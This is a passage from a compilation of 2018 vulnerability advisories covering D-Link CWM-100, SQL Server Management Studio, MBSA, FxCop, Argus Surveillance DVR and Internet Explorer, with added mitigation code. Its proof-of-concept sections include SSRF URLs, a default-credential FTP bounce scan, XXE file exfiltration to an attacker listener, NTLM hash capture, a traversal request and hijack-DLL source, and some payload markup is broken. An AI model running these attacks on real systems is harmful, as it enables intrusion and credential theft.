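On the constructed log this yields the two quserex.dll probes, the application-directory one first; the remediation is either shipping the DLL the service expects or making sure the directory is not writable by standard users, which is what the vendor's patch has to achieve.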



[Network Access]
Local



[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12,
2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23,
2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure




hyp3rlinx


[FD] CVE-2018-15517 / D-LINK Central WifiManager CWM-100 / Server Side Request Forgery

2018-11-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec


***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point
management tool, enabling you to create and manage multi-site,
multi-tenancy wireless networks.


[Vulnerability Type]
Server Side Request Forgery


[Affected Component]
MailConnect


[CVE Reference]
CVE-2018-15517


[Security Issue]
Using a web browser or a script, SSRF can be initiated against
internal/external systems to conduct port scans by leveraging D-LINK's
MailConnect component.

The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098
devices is intended to check a connection to an SMTP server but actually
allows outbound TCP to any port on any IP address, leading to SSRF, as
demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/
URI.
This can undermine accountability of where scans or connections actually
came from and/or bypass the firewall, etc. This can be automated via script
or using a web browser.


[Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/

reply: OK

Scan internal port 22 SSH:

https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK
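The fix for a "test my mail server" endpoint is to stop it being a general-purpose TCP client. The function below is an added example of that gate (an assumed policy, not D-Link's code): the requested host must equal the SMTP host already stored in the mail settings, the port must be an SMTP port, and a literal loopback, private or link-local address is refused unless the administrator has explicitly allowed an internal relay. Both PoC requests above (empty host, and 127.0.0.1 on port 22) are rejected by it.

```python
import ipaddress

SMTP_PORTS = {25, 465, 587}


def validate_mailconnect_target(host, port, configured_smtp_host, allow_internal=False):
    """Gate for a "test my SMTP server" feature (mitigation sketch, assumed
    policy rather than the product's code). Returns (allowed, reason)."""
    host = (host or "").strip().lower().rstrip(".")
    if not host or host != configured_smtp_host.strip().lower().rstrip("."):
        return False, "host differs from configured SMTP server"
    try:
        port = int(port)
    except (TypeError, ValueError):
        return False, "port is not an integer"
    if port not in SMTP_PORTS:
        return False, "port %d is not an SMTP port" % port
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname: the resolved address must be re-checked right before
        # connect(), or DNS rebinding turns the name back into 127.0.0.1.
        addr = None
    if addr is not None and not allow_internal and (
            addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_unspecified):
        return False, "%s is not a routable mail server address" % addr
    return True, "ok"


if __name__ == "__main__":
    # Constructed requests mirroring the two PoC URIs above.
    print(validate_mailconnect_target("", "", "smtp.example.com"))
    print(validate_mailconnect_target("127.0.0.1", 22, "smtp.example.com"))
    print(validate_mailconnect_target("smtp.example.com", 587, "smtp.example.com"))
```

The host-equality rule does most of the work; the address-range check is defence in depth for the case where the same attacker can also edit the saved SMTP host, which is why an internal relay has to be opted into rather than allowed by default.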



[Network Access]
Remote



[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12,
2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23,
2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure



hyp3rlinx


[FD] CVE-2018-15516 / D- LINK Central WifiManager CWM-100 / FTP Server PORT Bounce Scan

2018-11-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt
[+] ISR: ApparitionSec


***Greetz: indoushka | Eduardo B.***


[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point
management tool, enabling you to create and manage multi-site,
multi-tenancy wireless networks.


[Vulnerability Type]
FTP Server PORT Bounce Scan


[CVE Reference]
CVE-2018-15516


[Security Issue]
The FTP Server component of the D-LINK Central WifiManager can be used as a
man-in-the-middle machine, allowing PORT command bounce scan attacks.
This vulnerability allows remote attackers to abuse your network and
discreetly conduct network port scanning. Victims will then think these
scans originate from the D-LINK network running the afflicted FTP Server,
and not from the attacker.


[Exploit/POC]
D-LINK CWM-100 FTP Server listens on port 9000 (default), default creds are
"admin" "admin"

nmap -v -b admin:admin@VICTIM-IP:9000   -p 21,22,23,53,445
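The classic server-side mitigation for FTP bounce is to refuse any PORT command whose address is not the client on the control connection (and, conventionally, any privileged port). The following is an added example of that check, not D-Link's code: a parser for the RFC 959 h1,h2,h3,h4,p1,p2 argument and a policy function that a server would call before opening the data connection. The control-peer address and the PORT arguments are constructed.

```python
import ipaddress


def parse_port_command(arg: str):
    """Parse the h1,h2,h3,h4,p1,p2 argument of an FTP PORT command (RFC 959)
    into (IPv4Address, port)."""
    parts = arg.strip().split(",")
    if len(parts) != 6:
        raise ValueError("PORT needs six comma-separated numbers")
    nums = [int(p) for p in parts]
    if any(not 0 <= n <= 255 for n in nums):
        raise ValueError("each PORT field must be 0..255")
    host = ipaddress.IPv4Address(".".join(str(n) for n in nums[:4]))
    port = nums[4] * 256 + nums[5]
    return host, port


def port_command_allowed(control_peer: str, port_arg: str, min_port: int = 1024):
    """Bounce-scan mitigation (assumed policy): the data connection may only
    go back to the client that owns the control connection, and only to an
    unprivileged port. Returns (allowed, reason)."""
    try:
        host, port = parse_port_command(port_arg)
    except ValueError as e:
        return False, "malformed PORT: %s" % e
    if host != ipaddress.IPv4Address(control_peer):
        return False, "PORT host %s != control peer %s" % (host, control_peer)
    if port < min_port:
        return False, "PORT to privileged port %d refused" % port
    return True, "ok"


if __name__ == "__main__":
    # Constructed: the client itself asks for a data connection back to port 51210.
    print(port_command_allowed("203.0.113.10", "203,0,113,10,200,10"))
    # Constructed: a third-party host and port, the shape a bounce scan sends.
    print(port_command_allowed("203.0.113.10", "192,0,2,50,0,22"))
```

A scanner driving the server with `-b` as in the PoC produces exactly the second shape, so logging the refused PORT commands with the control peer's address also restores the attribution the advisory says the victim loses.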


[POC Video URL]
https://vimeo.com/299797225


[Network Access]
Remote



[Severity]
Medium



[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12,
2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month
10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23,
2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure




hyp3rlinx


[FD] CVE-2018-8533 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / REGSRVR file handling XML Injection

2018-10-16 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
SQL Server Management Studio 17.9
SQL Server Management Studio 18.0 (Preview 4)

SQL Server Management Studio is a software application first launched with
Microsoft SQL Server 2005 that is used for configuring, managing, and
administering all components within Microsoft SQL Server. The tool includes
both script editors and graphical tools which work with objects and
features of the server.



[Vulnerability Type]
XML External Entity Injection


[CVE Reference]
CVE-2018-8533


[Security Issue]
This vulnerability allows remote attackers to disclose sensitive
information on vulnerable installations of Microsoft SQL Server
Management Studio.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of REGSRVR files. Due to the
improper restriction of XML External Entity (XXE) references, a specially
crafted document specifying a URI causes the XML parser to access the URI
and embed the contents back into the XML document for further processing.
An attacker can leverage this vulnerability to disclose information in the
context of the current process.


[Exploit/POC]

1) python -m SimpleHTTPServer

2) "POC.xml"



http://127.0.0.1:8000/payload.dtd;>
%dtd;]>



3) "payload.dtd"


http://127.0.0.1:8000?%file;'>">
%all;


Result:

Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET
/?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci]
HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET
/?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci]
HTTP/1.1" 200 -



[References]
https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533



[Network Access]
Remote



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Release of advisory patch Tuesday : October 9, 2018
October 10, 2018 : Public Disclosure




hyp3rlinx



[FD] CVE-2018-8527 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / xel filetype XML Injection

2018-10-16 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
SQL Server Management Studio 17.9
SQL Server Management Studio 18.0 (Preview 4)

SQL Server Management Studio is a software application first launched with
Microsoft SQL Server 2005 that is used for configuring, managing, and
administering all components within Microsoft SQL Server. The tool includes
both script editors and graphical tools which work with objects and
features of the server.



[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
CVE-2018-8527


[Security Issue]
This vulnerability allows remote attackers to disclose sensitive
information on vulnerable installations of Microsoft SQL Server
Management Studio.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of XEL files. Due to the
improper restriction of XML External Entity (XXE) references, a specially
crafted document specifying a URI causes the XML parser to access the URI
and embed the contents back into the XML document for further processing.
An attacker can leverage this vulnerability to disclose information in
the context of the current process.



[References]
https://www.zerodayinitiative.com/advisories/ZDI-18-1131/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527



[Exploit/POC]
python -m SimpleHTTPServer (listens on port 8000)

"evil.xel" (Extended Event Log File)




http://127.0.0.1:8000/payload.dtd;>
%dtd;]>


"payload.dtd"


http://127.0.0.1:8000?%file;'>">
%all;


OR

Steal NTLM hashes

Kali Linux

/usr/share/responder/tools

responder -I eth0 -rv

"evil.xel"



%dtd;]>


Result: Forced authentication and NTLM hash captured


[Network Access]
Remote



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Release of advisory on Patch Tuesday: October 9, 2018
October 10, 2018 : Public Disclosure



hyp3rlinx



[FD] CVE-2018-8532 / Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / XML Injection

2018-10-16 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
SQL Server Management Studio 17.9
SQL Server Management Studio 18.0 (Preview 4)

SQL Server Management Studio is a software application first launched
with Microsoft SQL Server 2005 that is used for configuring, managing,
and administering all components within Microsoft SQL Server. The tool
includes both script editors and graphical tools which work with objects
and features of the server.



[Vulnerability Type]
XML External Entity Injection



[CVE Reference]
CVE-2018-8532


[Security Issue]
This vulnerability allows remote attackers to disclose sensitive
information on vulnerable installations of Microsoft SQL Server
Management Studio.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of XMLA files. Due to the
improper restriction of XML External Entity (XXE) references, a specially
crafted document specifying a URI causes the XML parser to access the URI
and embed the contents back into the XML document for further processing.
An attacker can leverage this vulnerability to disclose information in
the context of the current process.


[Exploit/POC]

1) python -m SimpleHTTPServer

2) "test.xmla"



http://127.0.0.1:8000/payload.dtd;>
%dtd;]>



3) "payload.dtd"


http://127.0.0.1:8000?%file;'>">
%all;

Result:

Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET
/?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci]
HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET
/?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci]
HTTP/1.1" 200 -



[References]
https://www.zerodayinitiative.com/advisories/ZDI-18-1132/
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532



[Network Access]
Remote



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Release of advisory on Patch Tuesday: October 9, 2018
October 10, 2018 : Public Disclosure




hyp3rlinx



[FD] ZDI-CAN-6307 / Microsoft Baseline Security Analyzer v2.3 / XML External Entity Injection

2018-09-10 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
[+] ISR: Apparition Security
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Microsoft Baseline Security Analyzer v2.3

Microsoft Baseline Security Analyzer (MBSA) is a software tool released by
Microsoft to determine security state by assessing missing security updates
and less-secure security settings within Microsoft Windows, Windows
components such as Internet Explorer and the IIS web server, products such
as Microsoft SQL Server, and Microsoft Office macro settings.


[Vulnerability Type]
XML External Entity Injection


[ZDI Reference]
ZDI-CAN-6307


[Security Issue]
Microsoft Baseline Security Analyzer allows local files to be exfiltrated
to a remote attacker controlled server if a user opens a specially crafted
".mbsa" file.



[Exploit/POC]

Install MBSA

https://www.microsoft.com/en-us/download/details.aspx?id=7558

1) "evil.mbsa"



http://127.0.0.1:8000/payload.dtd;>
%dtd;]>


2) "payload.dtd"


http://127.0.0.1:8000?%file;'>">
%all;

When the victim attempts to open the file they get prompted "Do you want to
let this app make changes to your device?" However, it also indicates it is
a "verified publisher", namely Microsoft. After opening, the local user's
files can be exfiltrated to a remote server. Moreover, we can use this to
steal NTLM hashes.

Using Forced Authentication to steal NTLM hashes

2) msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit -j

"evil.mbsa"



%dtd;]>

Result: credentials captured by remote server



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Program deprecated
September 8, 2018 : Public Disclosure




hyp3rlinx



[FD] Argus Surveillance DVR - 4.0.0.0 / Unauthenticated Directory Traversal File Disclosure

2018-08-31 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt
[+] ISR: Apparition Security

***Greetz: indoushka | Eduardo | GGA***


[Vendor]
www.argussurveillance.com


[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or motion-activated video
recording. You can monitor an unlimited number of cameras, through the
Internet or on-site. When our surveillance software detects motion in the
monitored area, it sounds an alarm, e-mails captured images, or records
video. This is security surveillance IP camera software. It has features to
place image overlays and date/time stamps, adjust picture size / quality,
and Pan/Tilt/Zoom control.


[Vulnerability Type]
Directory Traversal


[CVE Reference]
CVE-2018-15745


[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow unauthenticated directory
traversal, leading to file disclosure, via a ..%2F in the WEBACCOUNT.CGI
RESULTPAGE parameter.


[Affected Component]
WEBACCOUNT.CGI RESULTPAGE parameter


[Exploit/POC]
curl "http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini=1=="

; for 16-bit app support
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

wave=mmdrv.dll
timer=timer.drv
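
The RESULTPAGE handling described above, as an added example that is not the vendor's code: the vulnerable decode-and-join beside a resolver that rejects any value escaping the document root (the root path is a placeholder). The safe resolver also goes beyond the single ..%2F shown above and catches double-encoded and backslash variants.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/srv/argus/www"  # placeholder document root, not from the advisory


def resolve_vulnerable(web_root, result_page):
    """The flaw class: decode once and concatenate, so ..%2F walks out of root."""
    return posixpath.normpath(web_root + "/" + unquote(result_page))


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double encoding (..%252F) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_safe(web_root, result_page):
    """Return the path to serve, or None when the value must be rejected."""
    page = fully_decode(result_page)
    # NUL truncates C paths; a leading separator would be treated as absolute
    if "\x00" in page or page[:1] in ("/", "\\"):
        return None
    page = page.replace("\\", "/")  # the DVR runs on Windows, where \ separates too
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, page))
    # anything that does not stay strictly below the root is a traversal
    if not candidate.startswith(root + "/"):
        return None
    return candidate


def is_traversal_attempt(result_page):
    """Log-review helper for WEBACCOUNT.CGI requests: True if RESULTPAGE escapes root."""
    return resolve_safe(WEB_ROOT, result_page) is None
```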



[Video POC URL]
https://vimeo.com/287115273



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure




hyp3rlinx



[FD] Argus Surveillance DVR - 4.0.0.0 / SYSTEM Privilege Escalation

2018-08-31 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec


***Greetz: indoushka | Eduardo | GGA***


[Vendor]
www.argussurveillance.com



[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or motion-activated video
recording. You can monitor an unlimited number of cameras, through the
Internet or on-site. When our surveillance software detects motion in the
monitored area, it sounds an alarm, e-mails captured images, or records
video. This is security surveillance IP camera software. It has features to
place image overlays and date/time stamps, adjust picture size / quality,
and Pan/Tilt/Zoom control.


[Vulnerability Type]
SYSTEM Privilege Escalation



[CVE Reference]
N/A


[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Trojan file SYSTEM privilege
escalation. Placing a Trojan DLL named "gsm_codec.dll" in the Argus
application directory will lead to arbitrary code execution with SYSTEM
integrity.


[Affected Component]
DVRWatchdog.exe


[Exploit/POC]
Create a 32-bit DLL named "gsm_codec.dll" and place it in the application
directory, then launch Argus DVR. Tada! You're now SYSTEM.

#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 gsm_codec.c
gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
*/

/* Proof of load: pops a message box from whichever process loaded
   gsm_codec.dll (here DVRWatchdog.exe, running as SYSTEM). */
void systemo(){
    MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:{
            systemo();
            break;
        }
        case DLL_PROCESS_DETACH:{
            systemo();
            break;
        }
        case DLL_THREAD_ATTACH:{
            systemo();
            break;
        }
        case DLL_THREAD_DETACH:{
            systemo();
            break;
        }
    }
    return TRUE;
}



[Video POC URL]
https://vimeo.com/287115698



[Network Access]
Local


[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure




hyp3rlinx



[FD] Microsoft Windows "FxCop" v10-12 / XML External Entity Injection

2018-05-11 Thread hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: Apparition Security


***Greetz: indoushka|Eduardo|Dirty0tis***


Vendor:

www.microsoft.com


Product:
===
Microsoft Windows "FxCop" v10-12



Vulnerability Type:
===
XML External Entity



CVE Reference:
==
N/A


Security Issue:

FxCop is vulnerable to XML injection attacks allowing local file
exfiltration and/or NTLM hash theft. Tested with the Windows 7 and Windows
10 download SDKs; it works in both. If you have the particular SDK in
question it is probably there, but needs to be installed, as it was for me.


MSRC Response:
=
"We’ve determined that the issue was fixed in FxCop 14.0, but that it
repros in versions earlier than that (e.g. 10.0-12.0 as far as SDKs are
concerned, with version 13.0 skipped).
We have confirmation that the SDKs for Win8+ don’t ship FxCop.
We are going to pull Win7 SDKs containing v10-v12 of FxCop. Dissecting
SDKs and replacing the tool in situ is fraught with peril, and chaining in
a later FxCop to run after an SDK’s install (if even feasible) would just
draw attention to the problem.
Visual Studio (specifically, C++) ships a trimmed-down version of the
Windows 7 SDK, but it does not include FxCop, and so is unaffected.

In summary, newer versions of FxCop are unaffected and we will pull
afflicted versions from availability."


Exploit/POC:
=
1) python -m SimpleHTTPServer

2) "POC.FxCop"



http://ATTACKER-IP:8000/payload.dtd;>
%dtd;]>



3) "payload.dtd"


http://ATTACKER-IP:8000?%file;'>">
%all;

4) Import or Open "POC.FxCop" file in FxCop


Files get exfiltrated to attacker server.
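
A pre-open check for the four XXE advisories on this page (SSMS .xel and .xmla, MBSA .mbsa and FxCop .FxCop files), added here as an example and not code from those advisories: it lists every external DTD or entity a file declares without fetching any of them, using only Python's standard-library expat binding. The three sample files are constructed; the hostile one has the shape of the external-DTD trick the advisories describe.

```python
import xml.parsers.expat as expat

# Constructed samples (the advisories' own markup did not survive extraction).
# HOSTILE_XEL: an external parameter entity that would pull payload.dtd from
# the listener, then a body reference that depends on it.
HOSTILE_XEL = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;
]>
<data>&send;</data>
"""

# Same idea via an external DTD subset instead of an internal declaration.
EXTERNAL_SUBSET = b"""<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://127.0.0.1:8000/payload.dtd">
<data/>
"""

# A DTD that only defines an internal text entity is harmless.
BENIGN_XEL = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY product "SQL Server Management Studio"> ]>
<data>&product;</data>
"""


def audit_external_entities(xml_bytes):
    """List every external DTD/entity the document declares, fetching none.

    expat never resolves a SYSTEM identifier on its own, and parameter-entity
    parsing is pinned to NEVER, so %dtd; is skipped rather than followed."""
    findings = []

    def ref_name(name, is_param):
        return ("%" if is_param else "&") + name + ";"

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            findings.append({"ref": "<!DOCTYPE %s>" % name,
                             "kind": "external DTD subset",
                             "system_id": system_id})

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # internal entities carry their text in value; external ones carry an id
        if system_id or public_id:
            findings.append({"ref": ref_name(name, is_param),
                             "kind": ("external parameter entity" if is_param
                                      else "external general entity"),
                             "system_id": system_id})

    def on_skipped(name, is_param):
        # an unresolved &name; after a skipped %pe; is legal XML, but in these
        # file formats it shows the body was meant to depend on the fetched DTD
        findings.append({"ref": ref_name(name, is_param),
                         "kind": "reference to unresolved entity",
                         "system_id": None})

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.SkippedEntityHandler = on_skipped
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as err:
        # malformed input is reported as a finding, never silently accepted
        findings.append({"ref": None, "kind": "parse error: %s" % err,
                         "system_id": None})
    return findings


def is_safe_to_open(xml_bytes):
    """None of .xel/.xmla/.mbsa/.FxCop needs a DTD, so any finding is a refusal."""
    return not audit_external_entities(xml_bytes)
```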


Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: March 15, 2018
Vendor opens MSRC Case 44322?: March 16, 2018
Vendor reproduces issue : April 6, 2018
Vendor decides to pull all download links instead of advisory or fix :
April 9, 2018
May 9, 2018 : Public Disclosure




hyp3rlinx


[FD] Microsoft (Win 10) InternetExplorer v11.371.16299.0 - Denial Of Service

2018-04-20 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec


Vendor:
===
www.microsoft.com


Product:

Internet Explorer (Windows 10)
v11.371.16299.0

Internet Explorer is a series of graphical web browsers developed by
Microsoft and included in the Microsoft Windows line of operating
systems, starting in 1995.


Vulnerability Type:
==
Denial Of Service


CVE Reference:
==
N/A


Security Issue:

A null pointer de-reference (read) results in an Internet Explorer
Denial of Service (crash) when MSIE encounters a specially crafted
HTML HREF tag containing an empty reference for certain Windows file
types. Upon the IE crash it will at times daringly attempt to restart
itself; if that occurs and the user is prompted by IE to restore their
browser session, then selecting this option has, so far in my tests,
repeated the crash all over again. This can be leveraged by visiting a
hostile webpage or link to crash an end user's MSIE browser.

Referencing some of the following extensions .exe:, .com:, .pif:,
.bat: and .scr: should produce the same :)

Tested on Windows 10

Stack Dump:
==
(2e8c.27e4): Access violation - code c005 (first/second chance not
available)
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3  ret
0:015> r
rax=005b rbx=0003 rcx=0003
rdx=00cca6efd3a8 rsi= rdi=0003
rip=7ffabe5f0e14 rsp=00cca6efcfa8 rbp=
 r8=  r9= r10=
r11=0246 r12=0010 r13=00cca6efd3a8
r14= r15=
